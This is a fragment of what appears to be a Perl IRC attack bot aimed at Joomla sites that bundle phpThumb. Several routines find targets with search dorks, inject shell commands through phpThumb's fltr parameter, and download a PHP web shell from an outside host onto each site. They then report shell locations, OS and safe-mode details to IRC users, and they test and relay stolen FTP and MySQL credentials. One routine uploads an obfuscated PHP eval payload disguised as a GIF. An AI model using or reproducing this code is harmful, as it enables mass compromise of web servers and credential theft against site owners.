&get_content($ceklog2); if ($ftplog =~ /ftp/) { &msg("$admin","4,1[+]$mg2logo0,1$engine 4,1FTP[+] 4,1ftp://".$site." [+]username:".$usr." [+]password:".$pass.""); &msg("$chan","4,1[+]$$mg2logo0,1$engine 4,1FTP[+]Success send To Admin"); } if ($ftplog2 =~ /ftp/) { &msg("$admin","4,1[+]$$mg2logo0,1$engine 4,1FTP[+] 0,1ftp://".$site." [+]username:".$user." [+]password:".$pass.""); &msg("$chan","4,1[+]$$mg2logo0,1$engine 4,1FTP[+]Success send To Admin"); } my $hosts = "http://".$site; if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; &dbi_connect($host,$user,$pass,$dbname,$chan,$engine,$mg2logo);sleep(1); &msg("$chan","!ftp ".$host." ".$user." ".$pass.""); if ($dbname =~ /_/) {@users = split("_",$dbname); $dbuser = $users[0]; } &ftp_connect($url,$host,$dbuser,$pass,$chan,$engine,$mg2logo);sleep(1); &msg("$chan","!ftp ".$host." ".$dbuser." ".$pass.""); } } } sub flexi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$flelogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$flelogo15[2@12$engine15]14 Scan finish"); } my $target = "http://".$site.$bug; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $test = &get_content($target); if ($test =~ /\‰PNG/i) { #&msg("$chan","$flelogo15[2@12$engine15][2@12eXploiting15]3 http://$site 4please wait ..."); my $dor = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20http://bosnapost.com/NUNK/wp-includes/Text/Diff/robots.txt%20-O%20myluph.php;&phpThumbDebug=9"; my $open = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://bosnapost.com/NUNK/wp-includes/Text/Diff/robots.txt%20;mv%20robots.txt%20myluph.php;&phpThumbDebug=9"; my $explo = "http://".$site."components/com_flexicontent/librairies/phpthumb/phpThumb.php".$dor; my $openx = "http://".$site."components/com_flexicontent/librairies/phpthumb/phpThumb.php".$open; &get_content($explo); &get_content($openx); my $shell = "http://".$site."components/com_flexicontent/librairies/phpthumb/myluph.php"; my $shell2 = "http://".$site."components/com_flexicontent/librairies/myluph.php"; my $shell3 = "http://".$site."components/com_flexicontent/myluph.php"; my $bot = "http://".$site."components/com_flexicontent/librairies/phpthumb/metri.php"; my $bot2 = "http://".$site."components/com_flexicontent/librairies/metri.php"; my $bot3 = "http://".$site."components/com_flexicontent/metri.php"; my $box = "http://".$site."components/com_flexicontent/librairies/phpthumb/recky.php"; my $box2 = "http://".$site."components/com_flexicontent/librairies/recky.php"; my $box3 = "http://".$site."components/com_flexicontent/recky.php"; my $check = &get_content($shell."?thumb"); if ($check =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot); &get_content($box); sleep(2); &msg("$base","$flelogo15[2@12$engine15][2@12SheLL15]3 $shell 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$flelogo15[2@12$engine15][2@12SheLL15]3 $shell 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$flelogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } my $check2 = &get_content($shell2."?thumb"); if ($check2 =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check2 =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot2); &get_content($box2); sleep(2); &msg("$base","$flelogo15[2@12$engine15][2@12SheLL15]3 $shell2 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$flelogo15[2@12$engine15][2@12SheLL15]3 $shell2 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$flelogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } my $check3 = &get_content($shell3."?thumb"); if ($check3 =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check3 =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot3); &get_content($box3); sleep(2); &msg("$base","$flelogo15[2@12$engine15][2@12SheLL15]3 $shell3 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$flelogo15[2@12$engine15][2@12SheLL15]3 $shell3 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$flelogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } } } exit; } } } } ################################################################################ sub jmulti_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jmulogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jmulogo15[2@12$engine15]14 Scan finish"); } my $target = "http://".$site.$bug; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $test = &get_content($target); if ($test =~ /\‰PNG/i) { #&msg("$chan","$jmulogo15[2@12$engine15][2@12eXploiting15]3 http://$site 4please wait ..."); my $dor = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20http://bosnapost.com/NUNK/wp-includes/Text/Diff/robots.txt%20-O%20myluph.php;&phpThumbDebug=9"; my $open = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://bosnapost.com/NUNK/wp-includes/Text/Diff/robots.txt%20;mv%20robots.txt%20myluph.php;&phpThumbDebug=9"; my $explo = "http://".$site."components/com_jmultimedia/assets/thumbs/phpthumb/phpThumb.php".$dor; my $openx = "http://".$site."components/com_jmultimedia/assets/thumbs/phpthumb/phpThumb.php".$open; &get_content($explo); &get_content($openx); my $shell = "http://".$site."components/com_jmultimedia/assets/thumbs/phpthumb/myluph.php"; my $shell2 = "http://".$site."components/com_jmultimedia/assets/thumbs/myluph.php"; my $shell3 = "http://".$site."components/com_jmultimedia/assets/myluph.php"; my $bot = "http://".$site."components/com_jmultimedia/assets/thumbs/phpthumb/metri.php"; my $bot2 = "http://".$site."components/com_jmultimedia/assets/thumbs/metri.php"; my $bot3 = "http://".$site."components/com_jmultimedia/assets/metri.php"; my $box = "http://".$site."components/com_jmultimedia/assets/thumbs/phpthumb/recky.php"; my $box2 = "http://".$site."components/com_jmultimedia/assets/thumbs/recky.php"; my $box3 = "http://".$site."components/com_jmultimedia/assets/recky.php"; my $check = &get_content($shell."?thumb"); if ($check =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot); &get_content($box); sleep(2); &msg("$base","$jmulogo15[2@12$engine15][2@12SheLL15]3 $shell 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$jmulogo15[2@12$engine15][2@12SheLL15]3 $shell 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$jmulogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } my $check2 = &get_content($shell2."?thumb"); if ($check2 =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check2 =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot2); &get_content($box2); sleep(2); &msg("$base","$jmulogo15[2@12$engine15][2@12SheLL15]3 $shell2 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$jmulogo15[2@12$engine15][2@12SheLL15]3 $shell2 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$jmulogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } my $check3 = &get_content($shell3."?thumb"); if ($check3 =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check3 =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot3); &get_content($box3); sleep(2); &msg("$base","$jmulogo15[2@12$engine15][2@12SheLL15]3 $shell3 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$jmulogo15[2@12$engine15][2@12SheLL15]3 $shell3 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$jmulogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } } } exit; } } } } ################################################################################ sub alpha_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$alplogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$alplogo15[2@12$engine15]14 Scan finish"); } my $target = "http://".$site.$bug; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $test = &get_content($target); if ($test =~ /\‰PNG/i) { #&msg("$chan","$alplogo15[2@12$engine15][2@12eXploiting15]3 http://$site 4please wait ..."); my $dor = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20http://bosnapost.com/NUNK/wp-includes/Text/Diff/robots.txt%20-O%20myluph.php;&phpThumbDebug=9"; my $open = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://bosnapost.com/NUNK/wp-includes/Text/Diff/robots.txt%20;mv%20robots.txt%20myluph.php;&phpThumbDebug=9"; my $explo = "http://".$site."components/com_alphauserpoints/assets/phpThumb/phpThumb.php".$dor; my $openx = "http://".$site."components/com_alphauserpoints/assets/phpThumb/phpThumb.php".$open; &get_content($explo); &get_content($openx); my $shell = "http://".$site."components/com_alphauserpoints/assets/phpThumb/myluph.php"; my $shell2 = "http://".$site."components/com_alphauserpoints/assets/myluph.php"; my $shell3 = "http://".$site."components/com_alphauserpoints/myluph.php"; my $bot = "http://".$site."components/com_alphauserpoints/assets/phpThumb/metri.php"; my $bot2 = "http://".$site."components/com_alphauserpoints/assets/metri.php"; my $bot3 = "http://".$site."components/com_alphauserpoints/metri.php"; my $box = "http://".$site."components/com_alphauserpoints/assets/phpThumb/recky.php"; my $box2 = "http://".$site."components/com_alphauserpoints/assets/recky.php"; my $box3 = "http://".$site."components/com_alphauserpoints/recky.php"; my $check = &get_content($shell."?thumb"); if ($check =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot); &get_content($box); sleep(2); &msg("$base","$alplogo15[2@12$engine15][2@12SheLL15]3 $shell 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$alplogo15[2@12$engine15][2@12SheLL15]3 $shell 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$alplogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } my $check2 = &get_content($shell2."?thumb"); if ($check2 =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check2 =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot2); &get_content($box2); sleep(2); &msg("$base","$alplogo15[2@12$engine15][2@12SheLL15]3 $shell2 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$alplogo15[2@12$engine15][2@12SheLL15]3 $shell2 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$alplogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } my $check3 = &get_content($shell3."?thumb"); if ($check3 =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check3 =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot3); &get_content($box3); sleep(2); &msg("$base","$alplogo15[2@12$engine15][2@12SheLL15]3 $shell3 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$alplogo15[2@12$engine15][2@12SheLL15]3 $shell3 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$alplogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } } } exit; } } } } ################################################################################ sub act_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$actlogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$actlogo15[2@12$engine15]14 Scan finish"); } my $target = "http://".$site.$bug; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $test = &get_content($target); if ($test =~ /\‰PNG/i) { #&msg("$chan","$actlogo15[2@12$engine15][2@12eXploiting15]3 http://$site 4please wait ..."); my $dor = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20http://bosnapost.com/NUNK/wp-includes/Text/Diff/robots.txt%20-O%20myluph.php;&phpThumbDebug=9"; my $open = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://bosnapost.com/NUNK/wp-includes/Text/Diff/robots.txt%20;mv%20robots.txt%20myluph.php;&phpThumbDebug=9"; my $explo = "http://".$site."components/com_alphacontent/assets/phpThumb/phpThumb.php".$dor; my $openx = "http://".$site."components/com_alphacontent/assets/phpThumb/phpThumb.php".$open; &get_content($explo); &get_content($openx); my $shell = "http://".$site."components/com_alphacontent/assets/phpThumb/myluph.php"; my $shell2 = "http://".$site."components/com_alphacontent/assets/myluph.php"; my $shell3 = "http://".$site."components/com_alphacontent/myluph.php"; my $bot = "http://".$site."components/com_alphacontent/assets/phpThumb/metri.php"; my $bot2 = "http://".$site."components/com_alphacontent/assets/metri.php"; my $bot3 = "http://".$site."components/com_alphacontent/metri.php"; my $box = "http://".$site."components/com_alphacontent/assets/phpThumb/recky.php"; my $box2 = "http://".$site."components/com_alphacontent/assets/recky.php"; my $box3 = "http://".$site."components/com_alphacontent/recky.php"; my $check = &get_content($shell."?thumb"); if ($check =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot); &get_content($box); sleep(2); &msg("$base","$actlogo15[2@12$engine15][2@12SheLL15]3 $shell 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$actlogo15[2@12$engine15][2@12SheLL15]3 $shell 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$actlogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } my $check2 = &get_content($shell2."?thumb"); if ($check2 =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check2 =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot2); &get_content($box2); sleep(2); &msg("$base","$actlogo15[2@12$engine15][2@12SheLL15]3 $shell2 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$actlogo15[2@12$engine15][2@12SheLL15]3 $shell2 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$actlogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } my $check3 = &get_content($shell3."?thumb"); if ($check3 =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check3 =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot3); &get_content($box3); sleep(2); &msg("$base","$actlogo15[2@12$engine15][2@12SheLL15]3 $shell3 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$actlogo15[2@12$engine15][2@12SheLL15]3 $shell3 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$actlogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } } } exit; } } } } ################################################################################ sub hornot_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$horlogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$horlogo15[2@12$engine15]14 Scan finish"); } my $target = "http://".$site.$bug; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $test = &get_content($target); if ($test =~ /\‰PNG/i) { #&msg("$chan","$horlogo15[2@12$engine15][2@12eXploiting15]3 http://$site 4please wait ..."); my $dor = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20http://bosnapost.com/NUNK/wp-includes/Text/Diff/robots.txt%20-O%20myluph.php;&phpThumbDebug=9"; my $open = "?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://bosnapost.com/NUNK/wp-includes/Text/Diff/robots.txt%20;mv%20robots.txt%20myluph.php;&phpThumbDebug=9"; my $explo = "http://".$site."components/com_hotornot2/phpThumb/phpThumb.php".$dor; my $openx = "http://".$site."components/com_hotornot2/phpThumb/phpThumb.php".$open; &get_content($explo); &get_content($openx); my $shell = "http://".$site."components/com_hotornot2/phpThumb/myluph.php"; my $shell2 = "http://".$site."components/com_hotornot/phpThumb/myluph.php"; my $shell3 = "http://".$site."components/com_hotornot2/myluph.php"; my $bot = "http://".$site."components/com_hotornot2/phpThumb/metri.php"; my $bot2 = "http://".$site."components/com_hotornot/phpThumb/metri.php"; my $bot3 = "http://".$site."components/com_hotornot2/metri.php"; my $box = "http://".$site."components/com_hotornot2/phpThumb/recky.php"; my $box2 = "http://".$site."components/com_hotornot/phpThumb/recky.php"; my $box3 = "http://".$site."components/com_hotornot2/recky.php"; my $check = &get_content($shell."?thumb"); if ($check =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot); &get_content($box); sleep(2); &msg("$base","$horlogo15[2@12$engine15][2@12SheLL15]3 $shell 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$horlogo15[2@12$engine15][2@12SheLL15]3 $shell 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$horlogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } my $check2 = &get_content($shell2."?thumb"); if ($check2 =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check2 =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot2); &get_content($box2); sleep(2); &msg("$base","$horlogo15[2@12$engine15][2@12SheLL15]3 $shell2 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$horlogo15[2@12$engine15][2@12SheLL15]3 $shell2 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$horlogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } my $check3 = &get_content($shell3."?thumb"); if ($check3 =~ /bogel - exploit/i){ my $safe = ""; my $os = ""; my $uid = ""; if ($check3 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check3 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check3 =~ /uid=(.*?)gid=/){$uid=$1;} &get_content($bot3); &get_content($box3); sleep(2); &msg("$base","$horlogo15[2@12$engine15][2@12SheLL15]3 $shell3 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$nick","$horlogo15[2@12$engine15][2@12SheLL15]3 $shell3 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); &msg("$chan","$horlogo15[2@12$engine15][2@12SheLL15]3 Target Sent To 6$nick 15[4 SafeMode 15=4 $safe 15][4 OS 15=4 $os 15] "); } } } exit; } } } } ################################################################################## sub ftp_connect { my $url = $_[0]; my $host = $_[1]; my $user = $_[2]; my $pass = $_[3]; my $chan = $_[4]; my $engine = $_[5]; my $logo = $_[6]; my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7); $success = 0 if $ftp->login($user,$pass); $ftp->quit; if ($success == 0) { &msg("$admin","$logo4,1$engine 0,1<=>4,1FTP Accepted 0,1<=>4,1 http://".$host." |0,1 ".$user.":".$pass." ");sleep(2); } } sub dbi_connect () { my $host = $_[0]; my $user = $_[1]; my $pass = $_[2]; my $dtbs = $_[3]; my $chan = $_[4]; my $engine = $_[5]; my $logo = $_[6]; my $port = "3306"; my $platform = "mysql"; my $dsn = "dbi:$platform:$dtbs:$host:$port"; my $DBIconnect= DBI->connect($dsn,$user,$pass); if ($DBIconnect) { &msg("$chan","$logo4,1$engine 0,1<=>4,1SQL Accepted 0,1<=> 4,1[+]4,1 http://".$host." 0,1[+]4,1username:0,1".$user." 4,1[+]0,1password:0,1".$pass." 4,1[+]0,1dbname:4,1".$dbname.""); &msg("$admin","$logo4,1$engine 0,1<=>4,1SQL Accepted 0,1<=> 4,1[+]4,1 http://".$host." 0,1[+]4,1username:0,1".$user." 4,1[+]0,1password:0,1".$pass." 4,1[+]0,1dbname:4,1".$dbname.""); } } sub getUserPass() { my $string = $_[0]; my @lol = split("\r\n", $string); my $pass = ""; my $user = ""; foreach my $line (@lol) { if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) { $pass = $3; } if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) { $user = $3; } } return $user.":Viva-Byroe.Net:".$pass; } sub getinfo() { my $string = $_[0]; my @lol = split("\r\n", $string); my $pass = ""; my $user = ""; my $dbs = ""; foreach my $line (@lol) { if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) { $pass = $3; } if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) { $user = $3; } if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_name(.*?)=(.*?)"(.+?)";/i)) { $dbs = $3; } } return $user.":Viva-Byroe.Net:".$pass.":Viva-Byroe.Net:".$dbs; } ################################################################################## sub jg_magic(){ my $url = $_[0]; my $ua = LWP::UserAgent->new; $data = "GIF89a"; $data.= "<?php eval(gzinflate(str_rot13(base64_decode('rUl6QuNTEP5cJP7Dso1heh043EhIQoARlDi9VSWhZOgXQJZwYpIFv8m7Jpci/nt0ae28XA7KSBeB4sw887rPzvhZcSIouUdsyS0aCxmOEx5ZqixFIs8ktY9qasSES3tPV66sSeB7vt8b9GLYOLwPH9idev/0tLvTbRRFqCivMlJcZQhTrTkfwyMaDP/2hjf083VnFXwe+CNth3eR3WKoh95f154/Cq6HPQMY5/ECENSf8SQhveyeVJAkuc3QM5pGUcljwtPDmAPyDFiZT5IMhU6ax5wt018CevLUkjyqV6EW6P286wWXg44HDgbdLj1+3t3hieSvoPoAwtDxxHJoVU/qzu0xnRQvC166oJjlRY0XTJhleEwqM9/BbKczhP7VzeAPS51YXjIabZeDkbdzlIYiseikV5I0nIro42J0RhQ5RJ7SfU9o/+h+3b4hl0iiyFmp4qjdYToIvXmKvM1tSsTn5SPHJOoKYTMC0qb1IGHy1LTY5k999KsWYSHev9e9ExOr4dMf3uiGUlaeZOQSRVbmSBnxaGUw/2/YuxoF3d6fXv/80nCaIDGwSRBqheoMLq4vvf4oGA4GI2nn0Pa8OBBMlEcANc+T3ClzBTKn5KbBJto+Me55k/4PpNXRm3VocXUFoHWWE22ihFf46e/nct8rQtrm18m41P+YfQ2b5GPfpPiHux9WlCdjUz9/0h8AnkV0GcuhJ+3x0rgFwqCCI2mpUh0oLQAB9FB2oXI71H54jHgwgOQrEbvaRrqAVPCwDOFDMl0pp18r19NtRjw8NAhV8RiDVx+h/f1hOua2kmEz59Dl8cs3Gvh3nTVQMeBfhEfSd6DMtsm7asRvzGgt9LFvzNY8BSyQ3KTYH/Q9OGakUi0BcFqCBkGKOfSL4KWI5rEZDhGKWVetypWqLItcTajfdHqmYpBJ7aEu4ZlJ2QcfQ0RlSJUZTokD4IaUQnhlfT14+bdP3N5+QgxAvxykDoSVMziuMiUpzj4gyxVhCRLqHriUnr5+mBdsmoZM3GPgUXFSpYhNFNylin9ElCBaXBqlMd3U+tU4FSu98VDJcJhH+vcD4NuY2Sk73syUwwF2FymMSESEpdK4gzhHbpNsRg5J8x8lXBdWHsakKxKuy3UjbauamYhwntXZV5P7BmAC9rUarxf+pGjMQsbbq0z0+VxbH5H1JNb8cDeN9Ydf6zgZn+MDJUQSV+mqY8PAJEzr6Este3gK3nXv2kHAjt0wcNx5hVdbxALXRrG6A3stnVRwRqcDU0JNobcIrg3/hjUtbmqA0yDNwzR/5IHxzuMAAdY3WkdNBMYMlsUyG1SHqZP5Ia6wTTMOGknASecxjrZ0b2kI2dD7SBRkKYkCkfO1O5i/VB2YeuRM37atJtekYroMalG3rEmmsV619VUtV77OoF8aBh3qD+wbie8aMB5scaEnPZgNidp1WNffDcj/Y8oSVg6SkL3ga/u9bxxT4bK0PJtAemsGgd5sYA87QsIKZ9rwh20xrcoQ765+WLCb0rUtxvgX')))); ?> "; my $res = $ua->request(POST $url,Content_Type => 'text/plain', Content => $data); print $res->as_string(); } sub jg_cps(){ my $url = $_[0]; my $ua = LWP::UserAgent->new; $data = "GIF89a"; $data.= "<?php 